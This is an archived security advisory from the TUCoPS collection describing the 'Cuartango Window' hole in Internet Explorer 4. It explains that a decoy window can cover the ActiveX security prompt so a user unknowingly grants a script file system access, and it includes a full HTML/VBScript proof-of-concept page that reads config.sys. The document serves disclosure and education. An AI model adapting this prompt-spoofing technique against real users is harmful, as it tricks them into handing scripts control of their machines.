TUCoPS :: Browsers :: cuarta~2.txt

Cuartango Window - MSIE allows malicious VBScripts to take control of your PC!

Cuartango Window 

http://pages.whowhere.com/computers/cuartangojc/cuartangow1.html

Affected software
Microsoft Internet Explorer 4


Risks
Your computer is at risk a malicious VBScript can get full control over
your system. The VBScript can de everything : delete files, install
viruses, read your files ...


Technical description
When Microsoft Internet Explorer detects that a Visual Basic Script
included in an HTML page will create an object ("CreateObject" sentence)
your file system a security alert dialog is displayed :



Nobody with a minimum knowledge about ActiveX and VB Scripts would accept
this dialog. If you click the "yes" button your have given FULL CONTROL of
your machine to the VB Script code.

The vulnerability comes from the fact that is possibleto hide this dialog
box and get FULL CONTROL over the victim machine.

The key idea is very simple : just display a window over the security alert
hiding the message and replacing it by another friendly message but keeping
visible the buttons of the original message.

I will show you how the malicious script will work   :

First we open a friendly window (The Cuartango Window) :

set wcover = window.open ("welcome.htm", "Welcome . . . )

Next instruction will generate the security alert because we are accesing
the file system this prompt will be behind the welcome window  !!!

Set fs = CreateObject("Scripting.FileSystemObject")

At this moment instead of the alert shown above what we see is :





If the YES button is clicked the script has FULL CONTROL. The welcome
window in no longer needed and we close it

wcover.close

At this point we are the script owns   the machine as an, example I will
get the autoexec.bat file and display it in a text box. But the script
could do everything on your machine, delete all your files, install a virus
...

Set myfile = fs.OpenTextFile("c:\config.sys")
content = myfile.readall
myfile.Close
document.form1.s1.value = content


----------exploit code example----------

<html>

<head>
<meta name="description" content="Explorer vulnerability : Cuartango Window hole">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<meta name="keywords"
content="activex security,explorer security hole,explorer vulnerability,cuartango window,cuartango hole,cuartango hack,activex hole,vbscript hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>Cuartango Window demo</title>
</head>

<body bgcolor="#C0C0C0">
<script language="VBScript">

if instr(1,navigator.userAgent,"MSIE") = 0 then 
        msgbox "Please, use Microsoft Internet Explorer",0,"GoodBye"
        window.navigate "http://www.microsoft.com"
end if
if window.screen.width <> 800 then       
        alert "Your screen resolution must be 800 x 600"
        window.navigate "cuartangow1.html"
else   ' coordinates given for 800 x 600
        set wcover = window.open ("welcometrick.html", "Welcome", "top = 190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no, status=no")
        Set fs = CreateObject("Scripting.FileSystemObject")
        wcover.close
        Set myfile = fs.OpenTextFile("c:\config.sys")
        content = myfile.readall
        myfile.Close
end if

</script>


<h1 align="center"><font color="#FF0000">Cuartango Window Demo</font></h1>

<p align="center"><strong>This example shows you how ActiveX could destroy your system.
&nbsp; As an example I have read your config.sys file</strong><br>
Back to <a href="cuartangow1.html">Cuartango Window Page</a></p>

<form method="POST" name="form1">
  <div align="center"><center><p><textarea rows="18" name="S1" cols="49"></textarea></p>
  </center></div>
</form>
<script language="VBScript">

 document.form1.s1.value = content

</script>


<p>&nbsp;</p>
</body>
</html>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH